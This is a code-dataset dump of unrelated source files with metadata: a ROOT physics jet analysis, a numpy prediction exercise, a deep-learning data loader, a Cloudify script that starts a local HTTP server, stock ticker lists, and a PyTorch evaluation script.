jweight);\n if ( match_thr & bit(0) ) hJetEGm1thrNum_EGlow_->Fill(jet.Pt(), jweight);\n if ( match_thr & bit(1) ) hJetEGm1thrNum_EGmed_->Fill(jet.Pt(), jweight);\n if ( match_thr & bit(2) ) hJetEGm1thrNum_EGhigh_->Fill(jet.Pt(), jweight);\n }\n }\n\n if ( forwardJets.size() == 1 and not vetoEvent ) {\n LorentzVector jet = forwardJets[0];\n if ( hjetKinReweight_ != nullptr ) {\n weight *= hjetKinReweight_->GetBinContent(hjetKinReweight_->FindBin(std::abs(jet.Eta()), jet.Pt()));\n }\n hJetPtEtaFinOReffDenom_->Fill(std::abs(jet.Eta()), jet.Pt(), weight);\n if ( etaBinCut(jet) ) hJetL1ADenom_->Fill(jet.Pt(), weight);\n if ( L1GtBx[0] ) {\n hJetPtEtaFinOReffNum_bxm2_->Fill(std::abs(jet.Eta()), jet.Pt(), weight);\n if ( etaBinCut(jet) ) hJetL1ANum_bxm2_->Fill(jet.Pt(), weight);\n }\n if ( L1GtBx[1] ) {\n hJetPtEtaFinOReffNum_bxm1_->Fill(std::abs(jet.Eta()), jet.Pt(), weight);\n if ( etaBinCut(jet) ) hJetL1ANum_bxm1_->Fill(jet.Pt(), weight);\n }\n if ( L1GtBx[2] ) {\n hJetPtEtaFinOReffNum_bx0_->Fill(std::abs(jet.Eta()), jet.Pt(), weight);\n if ( etaBinCut(jet) ) hJetL1ANum_bx0_->Fill(jet.Pt(), weight);\n }\n if ( L1GtBx[3] ) {\n hJetPtEtaFinOReffNum_bx1_->Fill(std::abs(jet.Eta()), jet.Pt(), weight);\n if ( etaBinCut(jet) ) hJetL1ANum_bx1_->Fill(jet.Pt(), weight);\n }\n if ( L1GtBx[4] ) {\n hJetPtEtaFinOReffNum_bx2_->Fill(std::abs(jet.Eta()), jet.Pt(), weight);\n if ( etaBinCut(jet) ) hJetL1ANum_bx2_->Fill(jet.Pt(), weight);\n }\n }\n\n return kTRUE;\n}\n\"\"\"\n\ndef main():\n dirList=['/eos/cms/store/cmst3/group/top/RunIIReReco/l1prefire/Data13TeV_2017C_JetHT']\n\n t=ROOT.TChain('prefiringVBFAna/l1prefire')\n for d in dirList:\n for f in os.listdir(d):\n t.AddFile(os.path.join(d,f))\n\n runJetAnalysis(t)\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"TopAnalysis/test/analysis/l1prefire/runJetAnalysis.py","file_name":"runJetAnalysis.py","file_ext":"py","file_size_in_byte":6869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"182050209","text":"import numpy as np\n\n\ndef add_intercept(x):\n \"\"\"Adds a column of 1's to the non-empty numpy.ndarray x.\n Args:\n x: has to be an numpy.ndarray, a vector of dimension m * 1.\n Returns:\n X as a numpy.ndarray, a vector of dimension m * 2.\n None if x is not a numpy.ndarray.\n None if x is a empty numpy.ndarray.\n Raises:\n This function should not raise any Exception.\n \"\"\"\n if (not isinstance(x, np.ndarray) or len(x) == 0):\n return None\n if (x.ndim == 1):\n x2 = np.array([x])\n else:\n x2 = x.T\n lin = x2.shape[1]\n v1 = np.full((1, lin), 1)\n return 
np.concatenate((v1.T, x2.T), axis=1).astype(float)\n\n\ndef predict_(x, theta):\n \"\"\"Computes the vector of prediction y_hat from two non-empty np.ndarray.\n Args:\n x: has to be an np.ndarray, a vector of dimension m * 1.\n theta: has to be an np.ndarray, a vector of dimension 2 * 1.\n Returns:\n y_hat as a np.ndarray, a vector of dimension m * 1.\n None if x or theta are empty np.ndarray.\n None if x or theta dimensions are not appropriate.\n Raises:\n This function should not raise any Exceptions.\n \"\"\"\n if (not isinstance(x, np.ndarray) or not isinstance(theta, np.ndarray)\n or len(x) == 0 or len(theta) != 2):\n return None\n else:\n x = add_intercept(x)\n return x.dot(theta)\n\n\nif __name__ == '__main__':\n x = np.arange(1, 6)\n # Example 1:\n theta1 = np.array([5, 0])\n print(predict_(x, theta1))\n # Do you remember why y_hat contains only 5's here?\n # Example 2:\n theta2 = np.array([0, 1])\n print(predict_(x, theta2))\n # Do you remember why y_hat == x here?\n # Example 3:\n theta3 = np.array([5, 3])\n print(predict_(x, theta3))\n # Example 4:\n theta4 = np.array([-3, 1])\n print(predict_(x, theta4))\n","sub_path":"ex03/prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"641613406","text":"import cudarray as ca\nimport numpy as np\nfrom ..input import Input\n\n\nclass TransferInput(Input):\n def __init__(self, x1, x2, batch_size=128):\n super(TransferInput, self).__init__(x1, batch_size)\n self.x2 = x2\n self.batch_size2 = batch_size if batch_size > 0 else x2.shape[0]\n self.n_samples2 = x2.shape[0]\n self.n_batches2 = int(np.ceil(float(self.n_samples2) / self.batch_size))\n\n def batches(self, phase = 'train', domain = 'target'):\n if phase == 'train':\n for batch_start, batch_stop in self._batch_slices2(domain = 'target'):\n x1_batch = ca.array(self.x[batch_start:batch_stop])\n x2_batch = ca.array(self.x2[batch_start:batch_stop]) \n yield {'x1': x1_batch, 'x2': x2_batch}\n elif phase == 'test':\n if domain == 'target': \n for batch_start, batch_stop in self._batch_slices2(domain):\n x1_batch = ca.array(self.x[batch_start:batch_stop])\n yield {'x1': x1_batch}\n elif domain == 'source':\n for batch_start, batch_stop in self._batch_slices2(domain):\n x2_batch = ca.array(self.x2[batch_start:batch_stop]) \n yield {'x2': x2_batch}\n \n def _batch_slices2(self, domain = 'target'):\n if domain == 'target': \n for b in range(self.n_batches):\n batch_start = b * self.batch_size\n batch_stop = min(self.n_samples, batch_start + self.batch_size)\n yield batch_start, batch_stop\n elif domain == 'source':\n for b in range(self.n_batches2):\n batch_start = b * self.batch_size2\n batch_stop = min(self.n_samples2, batch_start + self.batch_size2)\n yield batch_start, batch_stop\n \n \n \n @property\n def x_shape(self):\n return (self.batch_size,) + self.x.shape[1:] + self.x2.shape[1:] \n\n @property\n def shapes(self):\n return {'x_shape': self.x_shape}\n\n\n\nclass SupervisedTransferInput(TransferInput):\n def __init__(self, x1, x2, y, batch_size=128):\n super(SupervisedTransferInput, self).__init__(x1, x2, batch_size)\n if x1.shape[0] != y.shape[0]:\n raise ValueError('shape mismatch between x and y')\n self.y = y\n\n def batches(self):\n for batch_start, batch_stop in self._batch_slices():\n x1_batch = ca.array(self.x[batch_start:batch_stop])\n x2_batch = ca.array(self.x2[batch_start:batch_stop])\n y_batch = ca.array(self.y[batch_start:batch_stop])\n 
yield {'x1': x1_batch, 'x2': x2_batch, 'y': y_batch}\n\n @property\n def y_shape(self):\n return (self.batch_size,) + self.y.shape[1:]\n \n @property\n def shapes(self):\n return {'x_shape': self.x_shape, 'y_shape': self.y_shape}","sub_path":"deeppy/transfernet/input.py","file_name":"input.py","file_ext":"py","file_size_in_byte":2959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"255709729","text":"import os\nimport sys\nimport subprocess\nfrom cloudify import ctx\n\nIS_WIN = os.name == 'nt'\n\n\ndef run_server(_path, _port):\n webserver_cmd = [sys.executable, '-m', 'SimpleHTTPServer', str(_port)]\n if not IS_WIN:\n webserver_cmd.insert(0, 'nohup')\n ctx.logger.info('Serving wagon port: {0}'.format(str(_port)))\n with open(os.devnull, 'wb') as dn:\n process = subprocess.Popen(webserver_cmd, stdout=dn, stderr=dn, cwd=_path)\n return process.pid\n\n\ndef set_pid(_pid):\n ctx.logger.info('Setting `pid` runtime property: {0}'.format(str(pid)))\n ctx.instance.runtime_properties['pid'] = _pid\n\n\nif __name__ == '__main__':\n\n wagon_directory = os.path.dirname(ctx.instance.runtime_properties['wagon'])\n port = ctx.node.properties['port']\n pid = run_server(wagon_directory, port)\n set_pid(pid)\n","sub_path":"scripts/wagon/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"385559286","text":"'''\nCreated on 15 Mar 2019\n\n@author: francescoferrari\n'''\n\nsp500 = [\n ('A','Health Care','USD'),\n ('AAL','Industrials','USD'),\n ('AAP','Consumer Discretionary','USD'),\n ('AAPL','Information Technology','USD'),\n ('ABBV','Health Care','USD'),\n ('ABC','Health Care','USD'),\n ('ABMD','Health Care','USD'),\n ('ABT','Health Care','USD'),\n ('ACN','Information Technology','USD'),\n ('ADBE','Information Technology','USD'),\n ('ADI','Information Technology','USD'),\n ('ADM','Consumer Staples','USD'),\n ('ADP','Information Technology','USD'),\n ('ADS','Information Technology','USD'),\n ('ADSK','Information Technology','USD'),\n ('AEE','Utilities','USD'),\n ('AEP','Utilities','USD'),\n ('AES','Utilities','USD'),\n ('AFL','Financials','USD'),\n ('AGN','Health Care','USD'),\n ('AIG','Financials','USD'),\n ('AIV','Real Estate','USD'),\n ('AIZ','Financials','USD'),\n ('AJG','Financials','USD'),\n ('AKAM','Information Technology','USD'),\n ('ALB','Materials','USD'),\n ('ALGN','Health Care','USD'),\n ('ALK','Industrials','USD'),\n ('ALL','Financials','USD'),\n ('ALLE','Industrials','USD'),\n ('ALXN','Health Care','USD'),\n ('AMAT','Information Technology','USD'),\n ('AMD','Information Technology','USD'),\n ('AME','Industrials','USD'),\n ('AMG','Financials','USD'),\n ('AMGN','Health Care','USD'),\n ('AMP','Financials','USD'),\n ('AMT','Real Estate','USD'),\n ('AMZN','Consumer Discretionary','USD'),\n ('ANET','Information Technology','USD'),\n ('ANSS','Information Technology','USD'),\n ('ANTM','Health Care','USD'),\n ('AON','Financials','USD'),\n ('AOS','Industrials','USD'),\n ('APA','Energy','USD'),\n ('APC','Energy','USD'),\n ('APD','Materials','USD'),\n ('APH','Information Technology','USD'),\n ('APTV','Consumer Discretionary','USD'),\n ('ARE','Real Estate','USD'),\n ('ARNC','Industrials','USD'),\n ('ATVI','Communication Services','USD'),\n ('AVB','Real Estate','USD'),\n ('AVGO','Information Technology','USD'),\n ('AVY','Materials','USD'),\n ('AWK','Utilities','USD'),\n ('AXP','Financials','USD'),\n ('AZO','Consumer 
Discretionary','USD'),\n ('BA','Industrials','USD'),\n ('BAC','Financials','USD'),\n ('BAX','Health Care','USD'),\n ('BBT','Financials','USD'),\n ('BBY','Consumer Discretionary','USD'),\n ('BDX','Health Care','USD'),\n ('BEN','Financials','USD'),\n ('BF-B','Consumer Staples','USD'),\n ('BHF','Financials','USD'),\n ('BHGE','Energy','USD'),\n ('BIIB','Health Care','USD'),\n ('BK','Financials','USD'),\n ('BKNG','Consumer Discretionary','USD'),\n ('BLK','Financials','USD'),\n ('BLL','Materials','USD'),\n ('BMY','Health Care','USD'),\n ('BR','Information Technology','USD'),\n ('BRK-B','Financials','USD'),\n ('BSX','Health Care','USD'),\n ('BWA','Consumer Discretionary','USD'),\n ('BXP','Real Estate','USD'),\n ('C','Financials','USD'),\n ('CAG','Consumer Staples','USD'),\n ('CAH','Health Care','USD'),\n ('CAT','Industrials','USD'),\n ('CB','Financials','USD'),\n ('CBOE','Financials','USD'),\n ('CBRE','Real Estate','USD'),\n ('CBS','Communication Services','USD'),\n ('CCI','Real Estate','USD'),\n ('CCL','Consumer Discretionary','USD'),\n ('CDNS','Information Technology','USD'),\n ('CE','Materials','USD'),\n ('CELG','Health Care','USD'),\n ('CERN','Health Care','USD'),\n ('CF','Materials','USD'),\n ('CFG','Financials','USD'),\n ('CHD','Consumer Staples','USD'),\n ('CHRW','Industrials','USD'),\n ('CHTR','Communication Services','USD'),\n ('CI','Health Care','USD'),\n ('CINF','Financials','USD'),\n ('CL','Consumer Staples','USD'),\n ('CLX','Consumer Staples','USD'),\n ('CMA','Financials','USD'),\n ('CMCSA','Communication Services','USD'),\n ('CME','Financials','USD'),\n ('CMG','Consumer Discretionary','USD'),\n ('CMI','Industrials','USD'),\n ('CMS','Utilities','USD'),\n ('CNC','Health Care','USD'),\n ('CNP','Utilities','USD'),\n ('COF','Financials','USD'),\n ('COG','Energy','USD'),\n ('COO','Health Care','USD'),\n ('COP','Energy','USD'),\n ('COST','Consumer Staples','USD'),\n ('COTY','Consumer Staples','USD'),\n ('CPB','Consumer Staples','USD'),\n ('CPRI','Consumer Discretionary','USD'),\n ('CPRT','Industrials','USD'),\n ('CRM','Information Technology','USD'),\n ('CSCO','Information Technology','USD'),\n ('CSX','Industrials','USD'),\n ('CTAS','Industrials','USD'),\n ('CTL','Communication Services','USD'),\n ('CTSH','Information Technology','USD'),\n ('CTXS','Information Technology','USD'),\n ('CVS','Health Care','USD'),\n ('CVX','Energy','USD'),\n ('CXO','Energy','USD'),\n ('D','Utilities','USD'),\n ('DAL','Industrials','USD'),\n ('DE','Industrials','USD'),\n ('DFS','Financials','USD'),\n ('DG','Consumer Discretionary','USD'),\n ('DGX','Health Care','USD'),\n ('DHI','Consumer Discretionary','USD'),\n ('DHR','Health Care','USD'),\n ('DIS','Communication Services','USD'),\n ('DISCA','Communication Services','USD'),\n ('DISCK','Communication Services','USD'),\n ('DISH','Communication Services','USD'),\n ('DLR','Real Estate','USD'),\n ('DLTR','Consumer Discretionary','USD'),\n ('DOV','Industrials','USD'),\n ('DRE','Real Estate','USD'),\n ('DRI','Consumer Discretionary','USD'),\n ('DTE','Utilities','USD'),\n ('DUK','Utilities','USD'),\n ('DVA','Health Care','USD'),\n ('DVN','Energy','USD'),\n ('DWDP','Materials','USD'),\n ('DXC','Information Technology','USD'),\n ('EA','Communication Services','USD'),\n ('EBAY','Consumer Discretionary','USD'),\n ('ECL','Materials','USD'),\n ('ED','Utilities','USD'),\n ('EFX','Industrials','USD'),\n ('EIX','Utilities','USD'),\n ('EL','Consumer Staples','USD'),\n ('EMN','Materials','USD'),\n ('EMR','Industrials','USD'),\n ('EOG','Energy','USD'),\n ('EQIX','Real 
Estate','USD'),\n ('EQR','Real Estate','USD'),\n ('ES','Utilities','USD'),\n ('ESS','Real Estate','USD'),\n ('ETFC','Financials','USD'),\n ('ETN','Industrials','USD'),\n ('ETR','Utilities','USD'),\n ('EVRG','Utilities','USD'),\n ('EW','Health Care','USD'),\n ('EXC','Utilities','USD'),\n ('EXPD','Industrials','USD'),\n ('EXPE','Consumer Discretionary','USD'),\n ('EXR','Real Estate','USD'),\n ('F','Consumer Discretionary','USD'),\n ('FANG','Energy','USD'),\n ('FAST','Industrials','USD'),\n ('FB','Communication Services','USD'),\n ('FBHS','Industrials','USD'),\n ('FCX','Materials','USD'),\n ('FDX','Industrials','USD'),\n ('FE','Utilities','USD'),\n ('FFIV','Information Technology','USD'),\n ('FIS','Information Technology','USD'),\n ('FISV','Information Technology','USD'),\n ('FITB','Financials','USD'),\n ('FL','Consumer Discretionary','USD'),\n ('FLIR','Information Technology','USD'),\n ('FLR','Industrials','USD'),\n ('FLS','Industrials','USD'),\n ('FLT','Information Technology','USD'),\n ('FMC','Materials','USD'),\n ('FOX','Communication Services','USD'),\n ('FOXA','Communication Services','USD'),\n ('FRC','Financials','USD'),\n ('FRT','Real Estate','USD'),\n ('FTI','Energy','USD'),\n ('FTNT','Information Technology','USD'),\n ('FTV','Industrials','USD'),\n ('GD','Industrials','USD'),\n ('GE','Industrials','USD'),\n ('GILD','Health Care','USD'),\n ('GIS','Consumer Staples','USD'),\n ('GLW','Information Technology','USD'),\n ('GM','Consumer Discretionary','USD'),\n ('GOOG','Communication Services','USD'),\n ('GOOGL','Communication Services','USD'),\n ('GPC','Consumer Discretionary','USD'),\n ('GPN','Information Technology','USD'),\n ('GPS','Consumer Discretionary','USD'),\n ('GRMN','Consumer Discretionary','USD'),\n ('GS','Financials','USD'),\n ('GT','Consumer Discretionary','USD'),\n ('GWW','Industrials','USD'),\n ('HAL','Energy','USD'),\n ('HAS','Consumer Discretionary','USD'),\n ('HBAN','Financials','USD'),\n ('HBI','Consumer Discretionary','USD'),\n ('HCA','Health Care','USD'),\n ('HCP','Real Estate','USD'),\n ('HD','Consumer Discretionary','USD'),\n ('HES','Energy','USD'),\n ('HFC','Energy','USD'),\n ('HIG','Financials','USD'),\n ('HII','Industrials','USD'),\n ('HLT','Consumer Discretionary','USD'),\n ('HOG','Consumer Discretionary','USD'),\n ('HOLX','Health Care','USD'),\n ('HON','Industrials','USD'),\n ('HP','Energy','USD'),\n ('HPE','Information Technology','USD'),\n ('HPQ','Information Technology','USD'),\n ('HRB','Consumer Discretionary','USD'),\n ('HRL','Consumer Staples','USD'),\n ('HRS','Industrials','USD'),\n ('HSIC','Health Care','USD'),\n ('HST','Real Estate','USD'),\n ('HSY','Consumer Staples','USD'),\n ('HUM','Health Care','USD'),\n ('IBM','Information Technology','USD'),\n ('ICE','Financials','USD'),\n ('IDXX','Health Care','USD'),\n ('IFF','Materials','USD'),\n ('ILMN','Health Care','USD'),\n ('INCY','Health Care','USD'),\n ('INFO','Industrials','USD'),\n ('INTC','Information Technology','USD'),\n ('INTU','Information Technology','USD'),\n ('IP','Materials','USD'),\n ('IPG','Communication Services','USD'),\n ('IPGP','Information Technology','USD'),\n ('IQV','Health Care','USD'),\n ('IR','Industrials','USD'),\n ('IRM','Real Estate','USD'),\n ('ISRG','Health Care','USD'),\n ('IT','Information Technology','USD'),\n ('ITW','Industrials','USD'),\n ('IVZ','Financials','USD'),\n ('JBHT','Industrials','USD'),\n ('JCI','Industrials','USD'),\n ('JEC','Industrials','USD'),\n ('JEF','Financials','USD'),\n ('JKHY','Information Technology','USD'),\n ('JNJ','Health Care','USD'),\n 
('JNPR','Information Technology','USD'),\n ('JPM','Financials','USD'),\n ('JWN','Consumer Discretionary','USD'),\n ('K','Consumer Staples','USD'),\n ('KEY','Financials','USD'),\n ('KEYS','Information Technology','USD'),\n ('KHC','Consumer Staples','USD'),\n ('KIM','Real Estate','USD'),\n ('KLAC','Information Technology','USD'),\n ('KMB','Consumer Staples','USD'),\n ('KMI','Energy','USD'),\n ('KMX','Consumer Discretionary','USD'),\n ('KO','Consumer Staples','USD'),\n ('KR','Consumer Staples','USD'),\n ('KSS','Consumer Discretionary','USD'),\n ('KSU','Industrials','USD'),\n ('L','Financials','USD'),\n ('LB','Consumer Discretionary','USD'),\n ('LEG','Consumer Discretionary','USD'),\n ('LEN','Consumer Discretionary','USD'),\n ('LH','Health Care','USD'),\n ('LIN','Materials','USD'),\n ('LKQ','Consumer Discretionary','USD'),\n ('LLL','Industrials','USD'),\n ('LLY','Health Care','USD'),\n ('LMT','Industrials','USD'),\n ('LNC','Financials','USD'),\n ('LNT','Utilities','USD'),\n ('LOW','Consumer Discretionary','USD'),\n ('LRCX','Information Technology','USD'),\n ('LUV','Industrials','USD'),\n ('LW','Consumer Staples','USD'),\n ('LYB','Materials','USD'),\n ('M','Consumer Discretionary','USD'),\n ('MA','Information Technology','USD'),\n ('MAA','Real Estate','USD'),\n ('MAC','Real Estate','USD'),\n ('MAR','Consumer Discretionary','USD'),\n ('MAS','Industrials','USD'),\n ('MAT','Consumer Discretionary','USD'),\n ('MCD','Consumer Discretionary','USD'),\n ('MCHP','Information Technology','USD'),\n ('MCK','Health Care','USD'),\n ('MCO','Financials','USD'),\n ('MDLZ','Consumer Staples','USD'),\n ('MDT','Health Care','USD'),\n ('MET','Financials','USD'),\n ('MGM','Consumer Discretionary','USD'),\n ('MHK','Consumer Discretionary','USD'),\n ('MKC','Consumer Staples','USD'),\n ('MLM','Materials','USD'),\n ('MMC','Financials','USD'),\n ('MMM','Industrials','USD'),\n ('MNST','Consumer Staples','USD'),\n ('MO','Consumer Staples','USD'),\n ('MOS','Materials','USD'),\n ('MPC','Energy','USD'),\n ('MRK','Health Care','USD'),\n ('MRO','Energy','USD'),\n ('MS','Financials','USD'),\n ('MSCI','Financials','USD'),\n ('MSFT','Information Technology','USD'),\n ('MSI','Information Technology','USD'),\n ('MTB','Financials','USD'),\n ('MTD','Health Care','USD'),\n ('MU','Information Technology','USD'),\n ('MXIM','Information Technology','USD'),\n ('MYL','Health Care','USD'),\n ('NBL','Energy','USD'),\n ('NCLH','Consumer Discretionary','USD'),\n ('NDAQ','Financials','USD'),\n ('NEE','Utilities','USD'),\n ('NEM','Materials','USD'),\n ('NFLX','Communication Services','USD'),\n ('NFX','Energy','USD'),\n ('NI','Utilities','USD'),\n ('NKE','Consumer Discretionary','USD'),\n ('NKTR','Health Care','USD'),\n ('NLSN','Industrials','USD'),\n ('NOC','Industrials','USD'),\n ('NOV','Energy','USD'),\n ('NRG','Utilities','USD'),\n ('NSC','Industrials','USD'),\n ('NTAP','Information Technology','USD'),\n ('NTRS','Financials','USD'),\n ('NUE','Materials','USD'),\n ('NVDA','Information Technology','USD'),\n ('NWL','Consumer Discretionary','USD'),\n ('NWS','Communication Services','USD'),\n ('NWSA','Communication Services','USD'),\n ('O','Real Estate','USD'),\n ('OKE','Energy','USD'),\n ('OMC','Communication Services','USD'),\n ('ORCL','Information Technology','USD'),\n ('ORLY','Consumer Discretionary','USD'),\n ('OXY','Energy','USD'),\n ('PAYX','Information Technology','USD'),\n ('PBCT','Financials','USD'),\n ('PCAR','Industrials','USD'),\n ('PEG','Utilities','USD'),\n ('PEP','Consumer Staples','USD'),\n ('PFE','Health Care','USD'),\n 
('PFG','Financials','USD'),\n ('PG','Consumer Staples','USD'),\n ('PGR','Financials','USD'),\n ('PH','Industrials','USD'),\n ('PHM','Consumer Discretionary','USD'),\n ('PKG','Materials','USD'),\n ('PKI','Health Care','USD'),\n ('PLD','Real Estate','USD'),\n ('PM','Consumer Staples','USD'),\n ('PNC','Financials','USD'),\n ('PNR','Industrials','USD'),\n ('PNW','Utilities','USD'),\n ('PPG','Materials','USD'),\n ('PPL','Utilities','USD'),\n ('PRGO','Health Care','USD'),\n ('PRU','Financials','USD'),\n ('PSA','Real Estate','USD'),\n ('PSX','Energy','USD'),\n ('PVH','Consumer Discretionary','USD'),\n ('PWR','Industrials','USD'),\n ('PXD','Energy','USD'),\n ('PYPL','Information Technology','USD'),\n ('QCOM','Information Technology','USD'),\n ('QRVO','Information Technology','USD'),\n ('RCL','Consumer Discretionary','USD'),\n ('RE','Financials','USD'),\n ('REG','Real Estate','USD'),\n ('REGN','Health Care','USD'),\n ('RF','Financials','USD'),\n ('RHI','Industrials','USD'),\n ('RHT','Information Technology','USD'),\n ('RJF','Financials','USD'),\n ('RL','Consumer Discretionary','USD'),\n ('RMD','Health Care','USD'),\n ('ROK','Industrials','USD'),\n ('ROL','Industrials','USD'),\n ('ROP','Industrials','USD'),\n ('ROST','Consumer Discretionary','USD'),\n ('RSG','Industrials','USD'),\n ('RTN','Industrials','USD'),\n ('SBAC','Real Estate','USD'),\n ('SBUX','Consumer Discretionary','USD'),\n ('SCHW','Financials','USD'),\n ('SEE','Materials','USD'),\n ('SHW','Materials','USD'),\n ('SIVB','Financials','USD'),\n ('SJM','Consumer Staples','USD'),\n ('SLB','Energy','USD'),\n ('SLG','Real Estate','USD'),\n ('SNA','Industrials','USD'),\n ('SNPS','Information Technology','USD'),\n ('SO','Utilities','USD'),\n ('SPG','Real Estate','USD'),\n ('SPGI','Financials','USD'),\n ('SRE','Utilities','USD'),\n ('STI','Financials','USD'),\n ('STT','Financials','USD'),\n ('STX','Information Technology','USD'),\n ('STZ','Consumer Staples','USD'),\n ('SWK','Industrials','USD'),\n ('SWKS','Information Technology','USD'),\n ('SYF','Financials','USD'),\n ('SYK','Health Care','USD'),\n ('SYMC','Information Technology','USD'),\n ('SYY','Consumer Staples','USD'),\n ('T','Communication Services','USD'),\n ('TAP','Consumer Staples','USD'),\n ('TDG','Industrials','USD'),\n ('TEL','Information Technology','USD'),\n ('TFX','Health Care','USD'),\n ('TGT','Consumer Discretionary','USD'),\n ('TIF','Consumer Discretionary','USD'),\n ('TJX','Consumer Discretionary','USD'),\n ('TMK','Financials','USD'),\n ('TMO','Health Care','USD'),\n ('TPR','Consumer Discretionary','USD'),\n ('TRIP','Communication Services','USD'),\n ('TROW','Financials','USD'),\n ('TRV','Financials','USD'),\n ('TSCO','Consumer Discretionary','USD'),\n ('TSN','Consumer Staples','USD'),\n ('TSS','Information Technology','USD'),\n ('TTWO','Communication Services','USD'),\n ('TWTR','Communication Services','USD'),\n ('TXN','Information Technology','USD'),\n ('TXT','Industrials','USD'),\n ('UA','Consumer Discretionary','USD'),\n ('UAA','Consumer Discretionary','USD'),\n ('UAL','Industrials','USD'),\n ('UDR','Real Estate','USD'),\n ('UHS','Health Care','USD'),\n ('ULTA','Consumer Discretionary','USD'),\n ('UNH','Health Care','USD'),\n ('UNM','Financials','USD'),\n ('UNP','Industrials','USD'),\n ('UPS','Industrials','USD'),\n ('URI','Industrials','USD'),\n ('USB','Financials','USD'),\n ('UTX','Industrials','USD'),\n ('V','Information Technology','USD'),\n ('VAR','Health Care','USD'),\n ('VFC','Consumer Discretionary','USD'),\n ('VIAB','Communication Services','USD'),\n 
('VLO','Energy','USD'),\n ('VMC','Materials','USD'),\n ('VNO','Real Estate','USD'),\n ('VRSK','Industrials','USD'),\n ('VRSN','Information Technology','USD'),\n ('VRTX','Health Care','USD'),\n ('VTR','Real Estate','USD'),\n ('VZ','Communication Services','USD'),\n ('WAT','Health Care','USD'),\n ('WBA','Consumer Staples','USD'),\n ('WCG','Health Care','USD'),\n ('WDC','Information Technology','USD'),\n ('WEC','Utilities','USD'),\n ('WELL','Real Estate','USD'),\n ('WFC','Financials','USD'),\n ('WHR','Consumer Discretionary','USD'),\n ('WLTW','Financials','USD'),\n ('WM','Industrials','USD'),\n ('WMB','Energy','USD'),\n ('WMT','Consumer Staples','USD'),\n ('WRK','Materials','USD'),\n ('WU','Information Technology','USD'),\n ('WY','Real Estate','USD'),\n ('WYNN','Consumer Discretionary','USD'),\n ('XEC','Energy','USD'),\n ('XEL','Utilities','USD'),\n ('XLNX','Information Technology','USD'),\n ('XOM','Energy','USD'),\n ('XRAY','Health Care','USD'),\n ('XRX','Information Technology','USD'),\n ('XYL','Industrials','USD'),\n ('YUM','Consumer Discretionary','USD'),\n ('ZBH','Health Care','USD'),\n ('ZION','Financials','USD'),\n ('ZTS','Health Care','USD')\n ]\nsmi = [\n ('ABBN.SWI','','CHF'),\n ('ADEN.SWI','','CHF'),\n ('BAER.SWI','','CHF'),\n ('CFR.SWI','','CHF'),\n ('CSGN.SWI','','CHF'),\n ('GEBN.SWI','','CHF'),\n ('GIVN.SWI','','CHF'),\n ('LHN.SWI','','CHF'),\n ('LONN.SWI','','CHF'),\n ('NESN.SWI','','CHF'),\n ('NOVN.SWI','','CHF'),\n ('ROG.SWI','','CHF'),\n ('SCMN.SWI','','CHF'),\n ('SGSN.SWI','','CHF'),\n ('SIKA.SWI','','CHF'),\n ('SLHN.SWI','','CHF'),\n ('SREN.SWI','','CHF'),\n ('UBSG.SWI','','CHF'),\n ('UHR.SWI','','CHF'),\n ('ZURN.SWI','','CHF')\n \n ]","sub_path":"tickers.py","file_name":"tickers.py","file_ext":"py","file_size_in_byte":23151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"428042245","text":"from tqdm import tqdm\nimport numpy as np\nimport torch\nfrom torch.utils.data import DataLoader\nfrom .preprocess import AttnDataset\nfrom .nn_models.attn_aggregate import AttnAggregateModel\nfrom .nn_models.baseline import BaselineModel\nfrom .evaluation.eval_metric import eval_sp\nfrom .evaluation.analysis import get_analysis\nfrom .std import *\nfrom . 
import config\n\nlogger = logging.getLogger(__name__)\n\n\ndef main():\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('-llv',\n default='INFO',\n help='Logging level')\n parser.add_argument('-log',\n default=None,\n help='Output log file')\n parser.add_argument('-model_file_name',\n required=True,\n help='trained model_file_name')\n parser.add_argument('-data_type',\n required=True)\n parser.add_argument('-adjust_weight',\n default=False,\n action='store_true')\n parser.add_argument('-transform',\n default=False,\n action='store_true')\n parser.add_argument('-batch_size',\n default=16,\n type=int,\n help='batch size')\n parser.add_argument('-sentence',\n type=int,\n default=1)\n parser.add_argument('-multiBERTs',\n default=False,\n action='store_true')\n parser.add_argument('-max_length',\n type=int,\n default=512)\n args = parser.parse_args()\n\n myLogFormat = '%(asctime)s **%(levelname)s** [%(name)s:%(lineno)s] - %(message)s'\n logging.basicConfig(level=str2llv(args.llv), format=myLogFormat, datefmt='%Y/%m/%d %H:%M:%S')\n if args.log:\n myhandlers = log_w(args.log)\n logger.addHandler(myhandlers)\n logger.log(100, ' '.join(sys.argv))\n else:\n logger.log(100, ' '.join(sys.argv))\n \n trained_baseline_model = BaselineModel()\n model = AttnAggregateModel(args.sentence, args.adjust_weight, trained_baseline_model=trained_baseline_model, transform=args.transform)\n \n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n model_folder = str(config.TRAINED_MODELS / args.model_file_name)\n model_path = get_model_path(model_folder)\n model.load_state_dict(torch.load(model_path, map_location=device))\n model.eval()\n \n # train set\n logger.info(\"Evaluate train set\")\n train_data = json_load(config.FGC_TRAIN)\n train_set = AttnDataset(train_data, args.data_type, args.multiBERTs, args.sentence, args.max_length, False)\n get_eval(model, train_data, args.batch_size, train_set, args.model_file_name, device, \"train_analysis.txt\")\n \n # dev set\n logger.info(\"Evaluate dev set\")\n dev_data = json_load(config.FGC_DEV)\n dev_set = AttnDataset(dev_data, args.data_type, args.multiBERTs, args.sentence, args.max_length, False)\n get_eval(model, dev_data, args.batch_size, dev_set, args.model_file_name, device, \"dev_analysis.txt\")\n \n # test set\n logger.info(\"Evaluate test set\")\n test_data = json_load(config.FGC_TEST)\n test_set = AttnDataset(test_data, args.data_type, args.multiBERTs, args.sentence, args.max_length, False)\n get_eval(model, test_data, args.batch_size, test_set, args.model_file_name, device, \"test_analysis.txt\")\n\n\ndef get_eval(model, data, batch_size, dataset, 